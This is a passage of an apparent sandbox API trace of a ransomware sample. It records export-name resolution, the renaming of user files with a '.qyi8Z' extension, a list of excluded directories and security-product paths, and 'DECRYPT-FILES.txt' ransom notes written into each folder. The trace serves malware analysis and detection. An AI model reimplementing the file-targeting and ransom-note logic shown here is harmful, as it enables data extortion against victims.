lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.291] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.291] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.292] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.292] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.292] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.292] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.292] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.292] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.292] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.292] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.292] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.292] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.292] lstrlenA (lpString="DELETEATOM") returned 10 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.292] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.292] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.292] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.292] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.292] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.292] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.292] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.293] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.293] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.293] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.293] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.293] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.293] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.293] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.293] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.293] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.293] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.293] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.293] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.293] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.293] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.293] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.293] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.293] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.293] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.293] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.293] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.294] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.294] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.294] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.294] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.294] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.294] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.294] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.294] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.294] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.294] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.294] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.294] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.294] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.294] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.294] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.294] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.294] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.295] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a") returned 50 [0085.295] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a.qyi8Z") returned 56 [0085.295] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k_fsfketr9.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a.qyi8Z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k_fsfketr9.m4a.qyi8z"), dwFlags=0x0) returned 1 [0085.295] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.296] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.296] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.296] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xf165f0a0, ftLastAccessTime.dwHighDateTime=0x1d4d3b8, ftLastWriteTime.dwLowDateTime=0xf165f0a0, ftLastWriteTime.dwHighDateTime=0x1d4d3b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PNWITRgLH_4la7ri", cAlternateFileName="PNWITR~1")) returned 1 [0085.296] lstrcmpW (lpString1="PNWITRgLH_4la7ri", lpString2=".") returned 1 [0085.296] lstrcmpW (lpString1="PNWITRgLH_4la7ri", lpString2="..") returned 1 [0085.296] lstrcatW (in: lpString1="PNWITRgLH_4la7ri", lpString2="\\" | out: lpString1="PNWITRgLH_4la7ri\\") returned="PNWITRgLH_4la7ri\\" [0085.296] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Program Files") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch=":\\Windows") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Games\\") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\All Users") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="AhnLab") returned 0x0 [0085.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.297] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.297] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\jkbimi8.tmp") returned 65 [0085.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.298] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.298] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\DECRYPT-FILES.txt") returned 71 [0085.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.310] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.311] CloseHandle (hObject=0x414) returned 1 [0085.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*" [0085.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xaf0aa8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0aa8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.312] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xaf0aa8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0aa8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.312] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0x78329830, ftLastAccessTime.dwHighDateTime=0x1d4d3b5, ftLastWriteTime.dwLowDateTime=0x78329830, ftLastWriteTime.dwHighDateTime=0x1d4d3b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6FQU", cAlternateFileName="")) returned 1 [0085.312] lstrcmpW (lpString1="6FQU", lpString2=".") returned 1 [0085.312] lstrcmpW (lpString1="6FQU", lpString2="..") returned 1 [0085.312] lstrcatW (in: lpString1="6FQU", lpString2="\\" | out: lpString1="6FQU\\") returned="6FQU\\" [0085.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Program Files") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch=":\\Windows") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Games\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\All Users") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="AhnLab") returned 0x0 [0085.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.312] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.313] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.313] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\jkbimi8.tmp") returned 70 [0085.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0085.313] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.313] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.313] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\DECRYPT-FILES.txt") returned 76 [0085.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0085.313] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0085.314] CloseHandle (hObject=0x42c) returned 1 [0085.315] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*" [0085.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0xaf0d0a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0085.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.315] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, 